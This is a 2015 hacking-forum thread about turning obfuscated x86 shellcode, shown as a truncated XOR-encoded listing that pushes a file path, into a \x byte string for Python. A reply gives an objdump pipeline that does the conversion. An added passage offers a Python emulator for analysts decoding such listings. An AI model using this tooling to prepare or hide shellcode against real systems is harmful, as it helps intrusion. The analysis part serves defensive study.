Author Topic: Converting shellcode.  (Read 1566 times)

Offline Vector

Converting shellcode.
« on: August 17, 2015, 06:30:52 PM »
Alright guys, so I got some obfuscated shellcode that I want to use in Python. However, to do so I must convert it from asm like this:

Code:
push 0x22657841
pop eax
shr eax,0x08
push eax
mov eax,0x1d4f211f
mov ebx,0x78614473
xor eax,ebx
push eax
mov eax,0x3c010e70
mov ebx,0x5567524a
xor eax,ebx
push eax
mov eax,0x3c481145
mov ebx,0x78736c6c

To something like this:

Code:
\x63\x6b\x72\x59\xf6\x58\xa5\xfe\x3f\x0b\x41\xa0\xf2
\xfe\x2d\xc9\x32\x3d\xd4\x51\xf7\xa7\x56\xf8\x69\x08
\x4d\x27\x8a\x2e\x19\x99\x7c\xfc\x63\xfa\x5c\xd5\xa8
\x1f\xa8\x9b\x88\xbb\xa5\x3c\x8f\x7f\x38\x45\xd1\x71

Unfortunately I have no idea how I should go about doing so, and I was wondering if you could lend me a hand.
"Words have no power to impress the mind without the exquisite horror of their reality"
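For anyone triaging a listing like the one in the post above, this added example (not part of the original thread) shows what the mov/xor/push pairs leave on the stack, which is the usual first step in analysing obfuscated shellcode. It interprets only the five instruction forms that appear in the listing; the function names are hypothetical, and the listing is cut off in the post, so the final mov pair is never pushed.

```python
import re

# Listing copied from the post above; it is truncated there.
LISTING = """\
push 0x22657841
pop eax
shr eax,0x08
push eax
mov eax,0x1d4f211f
mov ebx,0x78614473
xor eax,ebx
push eax
mov eax,0x3c010e70
mov ebx,0x5567524a
xor eax,ebx
push eax
mov eax,0x3c481145
mov ebx,0x78736c6c
"""

def value(operand, regs):
    """Resolve an operand: a register name or a hex immediate."""
    return regs[operand] if operand in regs else int(operand, 16)

def emulate(listing):
    """Interpret push/pop/mov/xor/shr only; return pushed dwords, oldest first."""
    regs = {"eax": 0, "ebx": 0}
    stack = []
    for line in filter(None, map(str.strip, listing.splitlines())):
        parts = re.split(r"[\s,]+", line)
        op, args = parts[0], parts[1:]
        if op == "push":
            stack.append(value(args[0], regs))
        elif op == "pop":
            regs[args[0]] = stack.pop()
        elif op == "mov":
            regs[args[0]] = value(args[1], regs)
        elif op == "xor":
            regs[args[0]] ^= value(args[1], regs)
        elif op == "shr":
            regs[args[0]] >>= value(args[1], regs)
        else:
            raise ValueError(f"unsupported instruction: {line!r}")
    return stack

def stack_bytes(stack):
    """Memory view: the last push sits at the lowest address, dwords little-endian."""
    return b"".join(v.to_bytes(4, "little") for v in reversed(stack))
```

Calling `stack_bytes(emulate(LISTING))` returns the tail of a NUL-terminated string ending in a file path, which is the kind of artifact worth searching for in host and proxy logs.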

Offline w33nd0x

Re: Converting shellcode.
« Reply #1 on: August 17, 2015, 08:37:35 PM »
Use this:

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

So replace "PROGRAM" with the binary asm file and it should spit out the useable shellcode via objdump.

Offline Vector

Re: Converting shellcode.
« Reply #2 on: August 18, 2015, 11:27:21 AM »
> Use this:
>
> objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
>
> So replace "PROGRAM" with the binary asm file and it should spit out the useable shellcode via objdump.

Nice, thanks man.
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline null_void

Re: Converting shellcode.
« Reply #3 on: August 24, 2015, 03:35:02 PM »
Nice, I will use this also if you do not mind. Thanks.
The most powerful weapon you have is knowledge! They may take your life but they can never take what is inside your mind.